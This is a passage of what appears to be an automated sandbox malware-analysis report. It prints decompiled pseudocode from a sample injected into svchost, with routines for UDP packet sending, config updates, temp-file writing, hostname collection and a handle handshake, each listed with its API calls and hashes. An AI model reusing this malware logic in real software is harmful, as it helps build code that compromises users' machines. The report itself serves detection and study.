                                                                                                                                  				 *_t49 = _t35;
                                                                                                                                  				_t36 =  *0x2522bf8; // 0x0
                                                                                                                                  				_t36[0] = _a12;
                                                                                                                                  				_t37 =  *_t63(1);
                                                                                                                                  				_t51 =  *0x2522bf8; // 0x0
                                                                                                                                  				_t51[1] = _t37;
                                                                                                                                  				_t52 =  *0x2522bf8; // 0x0
                                                                                                                                  				_t38 = 0;
                                                                                                                                  				_t52[1] = 0;
                                                                                                                                  				_t53 =  *0x2522bf8; // 0x0
                                                                                                                                  				_t53[2] = 0;
                                                                                                                                  				_t54 =  *0x2522bf8; // 0x0
                                                                                                                                  				_t54[2] = 0;
                                                                                                                                  				_t60 =  *0x2522bf8; // 0x0
                                                                                                                                  				_t55 = 0;
                                                                                                                                  				if( *_t65 != _t42) {
                                                                                                                                  					do {
                                                                                                                                  						_t43 =  *((intOrPtr*)(_t38 + _t65));
                                                                                                                                  						_a12 = _t38;
                                                                                                                                  						while(_t43 != 0) {
                                                                                                                                  							if(_t43 != 0x2e) {
                                                                                                                                  								_a12 = _a12 + 1;
                                                                                                                                  								_t43 =  *((intOrPtr*)(_a12 + _t65));
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
                                                                                                                                  						_t55 = _t55 + 1;
                                                                                                                                  						while(_t38 < _a12) {
                                                                                                                                  							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
                                                                                                                                  							_t55 = _t55 + 1;
                                                                                                                                  							_t38 = _t38 + 1;
                                                                                                                                  						}
                                                                                                                                  						if( *((char*)(_t38 + _t65)) == 0x2e) {
                                                                                                                                  							_t38 = _t38 + 1;
                                                                                                                                  						}
                                                                                                                                  						_t42 = 0;
                                                                                                                                  					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
                                                                                                                                  				}
                                                                                                                                  				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
                                                                                                                                  				_t24 = _t55 + 0xd; // 0xf
                                                                                                                                  				_t66 = _t24;
                                                                                                                                  				_t39 =  *_t63(0xf);
                                                                                                                                  				_t56 =  *0x2522bf8; // 0x0
                                                                                                                                  				 *((short*)(_t56 + _t66)) = _t39;
                                                                                                                                  				_t40 =  *_t63(1);
                                                                                                                                  				_t57 =  *0x2522bf8; // 0x0
                                                                                                                                  				 *((short*)(_t57 + _t66 + 2)) = _t40;
                                                                                                                                  				__imp__#20(_a4, 0x2522bf8, _t66 + 4, _t42, _a8, 0x10);
                                                                                                                                  				return 0 | _t40 <= 0x00000000;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251272E
                                                                                                                                  • htons.WS2_32(00000001), ref: 02512752
                                                                                                                                  • htons.WS2_32(0000000F), ref: 025127D5
                                                                                                                                  • htons.WS2_32(00000001), ref: 025127E3
                                                                                                                                  • sendto.WS2_32(?,02522BF8,00000009,00000000,00000010,00000010), ref: 02512802
                                                                                                                                    • Part of subcall function 0251EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0251EBFE,7FFF0001,?,0251DB55,7FFF0001), ref: 0251EBD3
                                                                                                                                    • Part of subcall function 0251EBCC: RtlAllocateHeap.NTDLL(00000000,?,0251DB55,7FFF0001), ref: 0251EBDA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1128258776-3142137124
                                                                                                                                  • Opcode ID: cabf81f59e2e20955d419b0d8034b312f28b6645f382f7c9f10785707d6e847a
                                                                                                                                  • Instruction ID: 30136d78e67a828164c2456156d2f285b1742a00d20fe139770bc8baf811aa95
                                                                                                                                  • Opcode Fuzzy Hash: cabf81f59e2e20955d419b0d8034b312f28b6645f382f7c9f10785707d6e847a
                                                                                                                                  • Instruction Fuzzy Hash: 723150386843969FEB208F74D480A627B60FF1A318F6B485DEC55CB392D732D459EB18
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0251E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
                                                                                                                                  				CHAR* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				CHAR* _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				CHAR* _v28;
                                                                                                                                  				CHAR* _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				char _v37;
                                                                                                                                  				char _v52;
                                                                                                                                  				char _v56;
                                                                                                                                  				intOrPtr _t87;
                                                                                                                                  				intOrPtr _t95;
                                                                                                                                  				int _t126;
                                                                                                                                  				void* _t136;
                                                                                                                                  				void* _t138;
                                                                                                                                  				CHAR* _t139;
                                                                                                                                  				void* _t146;
                                                                                                                                  				char _t150;
                                                                                                                                  				void* _t154;
                                                                                                                                  				void* _t158;
                                                                                                                                  				void* _t159;
                                                                                                                                  
                                                                                                                                  				_t146 = __edx;
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				E0251DD05();
                                                                                                                                  				_t150 = _a4;
                                                                                                                                  				_t158 = E0251DD84(_t150, _a8);
                                                                                                                                  				_pop(_t138);
                                                                                                                                  				if(_t158 != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t16 = _t158 + 0x30; // 0x30
                                                                                                                                  					_v8 = E02512419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
                                                                                                                                  					_t21 = lstrlenA(_a12) + 1; // 0x1
                                                                                                                                  					_t136 = _t21;
                                                                                                                                  					_t87 = lstrlenA(_a16) + _t136 + 1;
                                                                                                                                  					_v16 = _t87;
                                                                                                                                  					if(_v8 == 0) {
                                                                                                                                  						_t139 =  *((intOrPtr*)(_t158 + 0x24));
                                                                                                                                  						_v12 = _v12 & 0x00000000;
                                                                                                                                  						_v8 = _t139;
                                                                                                                                  						_t152 = _t139;
                                                                                                                                  					} else {
                                                                                                                                  						_t126 = lstrlenA(_v8);
                                                                                                                                  						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                                                                  						_v12 = _t126 + _t136 + 1;
                                                                                                                                  						_t87 = _v16;
                                                                                                                                  						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                                                                  					}
                                                                                                                                  					if(_v12 == _t87) {
                                                                                                                                  						E0251EE08(_t152 + _t158 + 0x30, _a12, _t136);
                                                                                                                                  						E0251EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
                                                                                                                                  						_t77 = _t158 + 0x30; // 0x30
                                                                                                                                  						_t95 = E025124C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
                                                                                                                                  						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
                                                                                                                                  							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
                                                                                                                                  							 *0x25236c0 = 1;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t41 = _t87 + 0x24; // 0x24
                                                                                                                                  						_t154 = E0251EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
                                                                                                                                  						if(_t154 != 0) {
                                                                                                                                  							_t43 = _t158 + 0xc; // 0xc
                                                                                                                                  							E0251EE08(_t154, _t43,  &(_v8[0x24]));
                                                                                                                                  							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
                                                                                                                                  							_v20 =  &(_v8[_t154]);
                                                                                                                                  							E0251EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
                                                                                                                                  							E0251EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
                                                                                                                                  							E0251EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
                                                                                                                                  							_t66 = _t154 + 0x24; // 0x24
                                                                                                                                  							 *((intOrPtr*)(_t154 + 0x14)) = E025124C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
                                                                                                                                  							E0251DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
                                                                                                                                  							E0251EC2E(_t154);
                                                                                                                                  							_v20 = 1;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L10:
                                                                                                                                  					E0251DD69();
                                                                                                                                  					return _v20;
                                                                                                                                  				}
                                                                                                                                  				_v56 = _t150;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_v24 = 3;
                                                                                                                                  				lstrcpynA( &_v52, _a8, 0x10);
                                                                                                                                  				_v37 = 0;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v36 = E025124C2( &_v20, 0, 0);
                                                                                                                                  				E0251DF4C(_t146,  &_v56);
                                                                                                                                  				_t158 = E0251DD84(_t150, _a8);
                                                                                                                                  				_t159 = _t159 + 0x18;
                                                                                                                                  				if(_t158 == 0) {
                                                                                                                                  					goto L10;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0251DD05: GetTickCount.KERNEL32 ref: 0251DD0F
                                                                                                                                    • Part of subcall function 0251DD05: InterlockedExchange.KERNEL32(025236B4,00000001), ref: 0251DD44
                                                                                                                                    • Part of subcall function 0251DD05: GetCurrentThreadId.KERNEL32 ref: 0251DD53
                                                                                                                                    • Part of subcall function 0251DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0251DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0251E3A7,000000F0), ref: 0251DDB5
                                                                                                                                  • lstrcpynA.KERNEL32(?,02511E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0251EAAA,?,?), ref: 0251E8DE
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0251EAAA,?,?,00000001,?,02511E84,?), ref: 0251E935
                                                                                                                                  • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0251EAAA,?,?,00000001,?,02511E84,?,0000000A), ref: 0251E93D
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0251EAAA,?,?,00000001,?,02511E84,?), ref: 0251E94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                                                                  • String ID: flags_upd$localcfg
                                                                                                                                  • API String ID: 204374128-3505511081
                                                                                                                                  • Opcode ID: 978059c5951b0a7feac348d0cf35e6ca5279edf358bcfee95c1acb6f424c4021
                                                                                                                                  • Instruction ID: a46cf1b0f84230449bbe787d85b1521412acd9f9df8a40274f0b710f569fb2c8
                                                                                                                                  • Opcode Fuzzy Hash: 978059c5951b0a7feac348d0cf35e6ca5279edf358bcfee95c1acb6f424c4021
                                                                                                                                  • Instruction Fuzzy Hash: 5D513E72D0020AAFDB11EFA8C985DAEBBFAFF48304F14456AE805A7250D775EA14CF54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 43%
                                                                                                                                  			E02516BA7(CHAR* _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				long _t14;
                                                                                                                                  				int _t19;
                                                                                                                                  				void* _t28;
                                                                                                                                  				void* _t39;
                                                                                                                                  
                                                                                                                                  				_push(_t30);
                                                                                                                                  				if(IsBadCodePtr( *0x25230ac) == 0) {
                                                                                                                                  					_push( &_v8);
                                                                                                                                  					_push(0);
                                                                                                                                  					if( *0x25230ac() == 0) {
                                                                                                                                  						_t28 = E0251EBCC(_v8);
                                                                                                                                  						if(_t28 == 0) {
                                                                                                                                  							L7:
                                                                                                                                  							_t14 = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_push( &_v8);
                                                                                                                                  							_push(_t28);
                                                                                                                                  							if( *0x25230ac() == 0) {
                                                                                                                                  								_v12 = 0;
                                                                                                                                  								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                  								if(_t39 != 0xffffffff) {
                                                                                                                                  									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
                                                                                                                                  									_push(_t39);
                                                                                                                                  									if(_t19 != 0) {
                                                                                                                                  										CloseHandle();
                                                                                                                                  										E0251EC2E(_t28);
                                                                                                                                  										_t14 = _v8;
                                                                                                                                  									} else {
                                                                                                                                  										CloseHandle();
                                                                                                                                  										DeleteFileA(_a4);
                                                                                                                                  										goto L9;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									L9:
                                                                                                                                  									E0251EC2E(_t28);
                                                                                                                                  									_t14 = 0;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								E0251EC2E(_t28);
                                                                                                                                  								goto L7;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t14 = 0;
                                                                                                                                  					}
                                                                                                                                  					return _t14;
                                                                                                                                  				} else {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Code
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3609698214-0
                                                                                                                                  • Opcode ID: f151adfbd96549aa852d473c942436265d7feb3503177224f2f5b01faff6daa7
                                                                                                                                  • Instruction ID: 352386952dfbc31c92e8b30cced713d2cfee4a4628a44d0ce28ea93e7504ad00
                                                                                                                                  • Opcode Fuzzy Hash: f151adfbd96549aa852d473c942436265d7feb3503177224f2f5b01faff6daa7
                                                                                                                                  • Instruction Fuzzy Hash: F2218176905106FFFB215B60ED49DAF7EACEB45368B114815F502E10C0EB319A18EA7C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E02519064(void* __eflags, void* _a4, CHAR* _a8) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v1032;
                                                                                                                                  				signed int _t29;
                                                                                                                                  				signed int _t62;
                                                                                                                                  				void* _t64;
                                                                                                                                  
                                                                                                                                  				GetTempPathA(0x400,  &_v1032);
                                                                                                                                  				E02518274( &_v1032);
                                                                                                                                  				_t29 = E0251ECA5();
                                                                                                                                  				_t62 = 9;
                                                                                                                                  				_push(_t29 % _t62);
                                                                                                                                  				_push(E0251ECA5() % _t62);
                                                                                                                                  				_push(E0251ECA5() % _t62);
                                                                                                                                  				_push(E0251ECA5() % _t62);
                                                                                                                                  				_push( &_v1032);
                                                                                                                                  				wsprintfA(_a8, E02512544(0x25222f8, 0x2520794, 0xf, 0xe4, 0xc8));
                                                                                                                                  				E0251EE2A(_t62, 0x25222f8, 0, 0x100);
                                                                                                                                  				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                  				if(_t64 <= 0) {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
                                                                                                                                  				CloseHandle(_t64);
                                                                                                                                  				return 1;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTempPathA.KERNEL32(00000400,?,00000000,025222F8), ref: 0251907B
                                                                                                                                  • wsprintfA.USER32 ref: 025190E9
                                                                                                                                  • CreateFileA.KERNEL32(025222F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0251910E
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 02519122
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0251912D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02519134
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2439722600-0
                                                                                                                                  • Opcode ID: 618076ec87d916d21c560678cba5aac374a35e8eb7773f3366e22b4d8192c685
                                                                                                                                  • Instruction ID: 4088c5479a0f39ded911437532134e4ba557f9d96963ce9cbcfc8b095f55e83e
                                                                                                                                  • Opcode Fuzzy Hash: 618076ec87d916d21c560678cba5aac374a35e8eb7773f3366e22b4d8192c685
                                                                                                                                  • Instruction Fuzzy Hash: 8811DDB6A411147BF7256A31DC0EFAF366EEBD5700F008465BB06E50C0EA704E159A68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251DD05() {
                                                                                                                                  				long _t4;
                                                                                                                                  				long _t10;
                                                                                                                                  
                                                                                                                                  				_t10 = GetTickCount();
                                                                                                                                  				while(InterlockedExchange(0x25236b4, 1) != 0) {
                                                                                                                                  					if(GetCurrentThreadId() !=  *0x25236b8) {
                                                                                                                                  						if(GetTickCount() - _t10 >= 0x2710) {
                                                                                                                                  							 *0x25236bc =  *0x25236bc & 0x00000000;
                                                                                                                                  						} else {
                                                                                                                                  							Sleep(0);
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L7:
                                                                                                                                  					_t4 = GetCurrentThreadId();
                                                                                                                                  					 *0x25236bc =  *0x25236bc + 1;
                                                                                                                                  					 *0x25236b8 = _t4;
                                                                                                                                  					return _t4;
                                                                                                                                  				}
                                                                                                                                  				goto L7;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251DD0F
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0251DD20
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251DD2E
                                                                                                                                  • Sleep.KERNEL32(00000000,?,761B43E0,?,00000000,0251E538,?,761B43E0,?,00000000,?,0251A445), ref: 0251DD3B
                                                                                                                                  • InterlockedExchange.KERNEL32(025236B4,00000001), ref: 0251DD44
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0251DD53
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3819781495-0
                                                                                                                                  • Opcode ID: 6c6b89cf75bec3703a8b641a9e6801122677c31e45ad0e93f9a53cae21cbb52b
                                                                                                                                  • Instruction ID: 2853ed3b961fac033693a7421d1fb9d9647cc0b627fbdc4512809cb0f99e6ab3
                                                                                                                                  • Opcode Fuzzy Hash: 6c6b89cf75bec3703a8b641a9e6801122677c31e45ad0e93f9a53cae21cbb52b
                                                                                                                                  • Instruction Fuzzy Hash: 39F0E971987104AFF7606F65A884B353BBAF767351F420855E109D21C0C724646DEF2D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Sandbox decompilation. Copies the local hostname into the caller's
			// buffer _a4 keeping only [A-Za-z0-9.], strips one trailing '.', and
			// falls back to the literal "LocalHost" when gethostname fails or the
			// sanitized result is empty.
			E0251AD08(CHAR* _a4) {
				char _v132;            // 0x80-byte hostname buffer
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {         // gethostname failed (non-zero return)
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {  // output already holds a name: done
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");   // fallback name
				}
				_t13 = _a4;            // write cursor in the output buffer
				_t11 = _v132;          // current input character
				_t12 =  &_v132;        // read cursor in the hostname buffer
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {           // not 'a'..'z'
						if(_t11 < 0x41 || _t11 > 0x5a) {       // not 'A'..'Z'
							if(_t11 < 0x30 || _t11 > 0x39) {   // not '0'..'9'
								if(_t11 != 0x2e) {             // not '.'
									goto L10;                  // drop this character
								}
							}
						}
						goto L9;
					} else {
						L9:                                    // keep the character
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:                                   // advance input
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {    // strip a trailing '.' from the result
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;                  // empty result falls back to "LocalHost"
			}
Addresses (one per line of the function body above, in order): 0x0251ad1c 0x0251ad24 0x0251ad71 0x0251ad74 0x0251ad77 0x0251ad88 0x0251ad88 0x00000000 0x0251ad7f 0x0251ad26 0x0251ad29 0x0251ad2c 0x0251ad2f 0x0251ad55 0x0251ad35 0x0251ad3d 0x0251ad45 0x0251ad4d 0x00000000 0x00000000 0x0251ad4d 0x0251ad45 0x00000000 0x0251ad4f 0x0251ad4f 0x0251ad4f 0x0251ad51 0x0251ad52 0x0251ad52 0x0251ad53 0x00000000 0x0251ad53 0x0251ad35 0x0251ad60 0x0251ad66 0x0251ad69 0x0251ad6b 0x0251ad6b 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • gethostname.WS2_32(?,00000080), ref: 0251AD1C
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0251AD60
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0251AD69
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0251AD7F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$gethostnamelstrcpy
                                                                                                                                  • String ID: LocalHost
                                                                                                                                  • API String ID: 3695455745-3154191806
                                                                                                                                  • Opcode ID: a8a00b7a3eafad20af17732cc645621ecbe273243805ec826bcfb185d2caca9a
                                                                                                                                  • Instruction ID: 2af4829531964ba2f3932752322f41cf46a2c2b38fc2d0719038444f76443e18
                                                                                                                                  • Opcode Fuzzy Hash: a8a00b7a3eafad20af17732cc645621ecbe273243805ec826bcfb185d2caca9a
                                                                                                                                  • Instruction Fuzzy Hash: 3A01492088758A5DFF331A38C444BB83F767B9760AF400055E4C08B195EF24844BC79D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Sandbox decompilation. Opens a handle via E02514000, exchanges a
			// 4-byte value with it (the reply must equal value + value/4), then
			// sends a small 12-byte record whose third field depends on _a4.
			// E02513F18 / E02513F8C appear to be write / read helpers that take
			// the event _v8 and 0x7d0 (= 2000, likely a millisecond timeout).
			E02514280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);   // manual-reset event, initially signaled
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E02514000(E02513ECD(_t68),  &_v20);   // handle returned in _v20
					if(_t38 == 0) {
						L11:
						_t40 = CloseHandle(_v8) | 0xffffffff;   // error path: return -1
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {         // INVALID_HANDLE_VALUE (-1)
						goto L12;
					}
					_v16 = E0251ECA5();        // value to send
					E02513F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E02513F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {   // read failed or reply != value * 1.25
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);                 // answer with reply * 1.25
						E02513F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;                                // record size: 12 bytes
						_v24 = 1;
						E02513F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0251EBCC(_t73);                    // allocate the 12-byte record
						 *_t74 = 0x5e;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;   // third field = 0
							 *0x252215a =  *0x252215a + 1;               // global counter
						} else {
							 *(_t74 + 8) = 1;                            // third field = 1
						}
						E02513F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0251EC2E(_t74);                           // free the record
						E02513F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;              // returns 1 when _a4 == 0, else 0
						goto L12;
					}
				}
				return _t35 | 0xffffffff;      // CreateEventA failed: return -1
			}
Addresses (one per line of the function body above, in order): 0x02514280 0x02514290 0x02514296 0x0251429b 0x025142b1 0x025142ba 0x025143c1 0x025143ca 0x025143cd 0x00000000 0x025143ce 0x025142c0 0x025142c3 0x025142c8 0x00000000 0x00000000 0x025142dc 0x025142e6 0x02514300 0x025143bb 0x00000000 0x02514318 0x02514322 0x0251432c 0x02514333 0x02514336 0x02514342 0x02514345 0x02514350 0x02514359 0x0251435f 0x02514366 0x02514371 0x02514375 0x02514368 0x02514368 0x02514368 0x02514384 0x0251438a 0x0251439a 0x025143ab 0x025143ae 0x025143b5 0x00000000 0x025143b5 0x02514300 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,025198FD,00000001,00000100,025222F8,0251A3C7), ref: 02514290
                                                                                                                                  • CloseHandle.KERNEL32(0251A3C7), ref: 025143AB
                                                                                                                                  • CloseHandle.KERNEL32(00000001), ref: 025143AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateEvent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1371578007-0
                                                                                                                                  • Opcode ID: 9cef289063de6c64f0c8d759e5726093bf703693133acf0eb0958b4f52f5ad53
                                                                                                                                  • Instruction ID: 45262c41699d18bc20f3e71e1a91d5273a314fc368bcfdf4caa7f418582798d4
                                                                                                                                  • Opcode Fuzzy Hash: 9cef289063de6c64f0c8d759e5726093bf703693133acf0eb0958b4f52f5ad53
                                                                                                                                  • Instruction Fuzzy Hash: 26419D7180020ABAEF10ABA1DD85FAFBFB9FF40324F105955F614A21C0D7348695DBA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02516069(_Unknown_base(*)()* _a4) {
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				_Unknown_base(*)()* _t48;
                                                                                                                                  				_Unknown_base(*)()* _t50;
                                                                                                                                  				struct HINSTANCE__* _t52;
                                                                                                                                  				_Unknown_base(*)()* _t53;
                                                                                                                                  				_Unknown_base(*)()* _t54;
                                                                                                                                  				_Unknown_base(*)()* _t55;
                                                                                                                                  				signed int _t56;
                                                                                                                                  				_Unknown_base(*)()* _t59;
                                                                                                                                  				_Unknown_base(*)()* _t62;
                                                                                                                                  				_Unknown_base(*)()* _t63;
                                                                                                                                  				intOrPtr _t69;
